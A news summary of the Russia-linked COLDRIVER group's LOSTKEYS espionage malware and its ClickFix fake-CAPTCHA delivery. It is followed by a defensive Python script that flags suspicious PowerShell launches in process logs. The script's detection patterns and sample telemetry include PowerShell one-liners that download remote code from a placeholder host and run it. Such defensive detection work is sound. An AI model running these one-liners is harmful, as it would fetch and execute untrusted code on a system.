Russian Hackers Using ClickFix Fake CAPTCHA to Deploy New LOSTKEYS Malware

The Russia-linked threat actor COLDRIVER has been deploying a new malware called LOSTKEYS in highly targeted espionage activities, using social engineering techniques like ClickFix to infect victims. The campaigns focus on current and former Western government advisors, journalists, NGOs, and individuals connected to Ukraine, with the malware capable of stealing files, system info, and running processes. (Affected: Western government advisors, journalists, NGOs, Ukrainian individuals)

Key points:

  • COLDRIVER has introduced LOSTKEYS, a new custom malware used in targeted espionage campaigns since early 2025.
  • The malware is delivered via sophisticated social engineering, including ClickFix-based methods involving fake CAPTCHA prompts and PowerShell downloads.
  • LOSTKEYS can exfiltrate files with specific extensions, send system information, and identify running processes on compromised devices.
  • Additional artifacts linked to LOSTKEYS have been identified as far back as December 2023, masquerading as binaries from the Maltego platform.
  • The group has transitioned from credential theft campaigns to deploying malware directly onto targets’ systems, marking a strategic shift in their operations.
  • ClickFix is increasingly used by various threat actors to spread malware such as Lampion, Atomic Stealer, and others, often via complex multi-stage infection chains.
  • Recent campaigns leverage sophisticated techniques like blockchain-based payload concealment and large-scale watering hole attacks, exemplified by the MacReaper campaign compromising thousands of websites.
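The ClickFix chain described above ends with the victim pasting a PowerShell download command into a Run dialog or console, which is the point where endpoint telemetry is most useful to a defender. The following is an added example, not code from the article or from the underlying report: a small triage script that scores constructed process-creation records for that pattern (PowerShell started from an interactive parent, carrying a download cradle and window-hiding or policy-bypass switches). The log format, hostnames, users, URLs and the indicator lists are assumptions chosen for illustration; the weights and threshold are arbitrary starting points, not a validated rule.

```python
"""
Heuristic triage of process-creation telemetry for ClickFix-style launches:
PowerShell started interactively (Run dialog or console) with a download
cradle plus window-hiding / policy-bypass switches.  Example code, not the
article's or the report's; the record format and samples below are constructed.
"""
import re
from dataclasses import dataclass, field
from typing import Iterable, List

# Generic, widely documented PowerShell download-cradle tokens (weight 3 each).
DOWNLOAD_PATTERNS = [
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"invoke-restmethod", r"\birm\b", r"net\.webclient", r"start-bitstransfer",
    r"\bcurl\b", r"\bwget\b",
]
# Switches that hide the window, skip the profile, bypass policy or run
# encoded / piped script text (weight 2 each).
EVASION_PATTERNS = [
    r"-w(indowstyle)?\s+h(idden)?\b", r"-nop\b", r"-noprofile\b",
    r"-ep\s+bypass", r"-executionpolicy\s+bypass",
    r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", r"\biex\b", r"invoke-expression",
]
# Parents meaning a human typed or pasted the command (Win+R -> explorer.exe,
# or a console) rather than a scheduler or management agent (weight 2).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
SUSPICIOUS_THRESHOLD = 5  # assumed tuning value


@dataclass
class ProcessEvent:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Verdict:
    event: ProcessEvent
    score: int
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD


def parse_line(line: str) -> ProcessEvent:
    # Constructed record format: host|user|parent_image|image|command_line.
    # maxsplit=4 keeps any '|' that appears inside the command line intact.
    host, user, parent, image, cmd = line.rstrip("\n").split("|", 4)
    return ProcessEvent(host, user, parent, image, cmd)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> Verdict:
    verdict = Verdict(ev, 0)
    if _basename(ev.image) not in POWERSHELL_IMAGES:
        return verdict  # only PowerShell launches are in scope here
    cmd = ev.command_line.lower()
    if _basename(ev.parent_image) in INTERACTIVE_PARENTS:
        verdict.score += 2
        verdict.reasons.append(f"interactive parent {ev.parent_image}")
    for pat in DOWNLOAD_PATTERNS:
        if re.search(pat, cmd):
            verdict.score += 3
            verdict.reasons.append(f"download cradle /{pat}/")
    for pat in EVASION_PATTERNS:
        if re.search(pat, cmd):
            verdict.score += 2
            verdict.reasons.append(f"evasion switch /{pat}/")
    return verdict


def triage(lines: Iterable[str]) -> List[Verdict]:
    return [score_event(parse_line(ln)) for ln in lines if ln.strip()]


# Constructed sample telemetry; hosts, users and URLs are placeholders.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    # Run-dialog launch with hidden window, no profile, download piped to iex
    "WS01|CORP\\alice|C:\\Windows\\explorer.exe|" + PS + "|"
    "powershell -w hidden -nop -c \"iwr http://example.invalid/captcha.txt | iex\"",
    # Management script started by a service: policy bypass alone is not enough
    "WS02|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\services.exe|" + PS + "|"
    "powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\Inventory\\collect.ps1",
    # Ordinary interactive use
    "WS03|CORP\\carol|C:\\Windows\\explorer.exe|" + PS + "|"
    "powershell Get-ChildItem C:\\Users\\carol\\Documents",
    # Console launch of a WebClient cradle
    "WS04|CORP\\dave|C:\\Windows\\System32\\cmd.exe|" + PS + "|"
    "powershell -nop -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/a') | IEX\"",
]

if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if v.suspicious else "ok"
        print(f"{flag:10} score={v.score:2} {v.event.host} {v.event.user}: "
              f"{v.event.command_line[:60]}")
        for reason in v.reasons:
            print("    -", reason)
```

Scoring on the parent process is what separates the ClickFix pattern from routine automation: the same download cradle launched by a scheduler or management agent still scores, but an explorer.exe or console parent adds the weight that pushes a pasted command over the threshold. In practice the pattern lists need tuning against the environment's own baseline before being promoted to an alert.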

Read More: https://thehackernews.com/2025/05/russian-hackers-using-clickfix-fake.html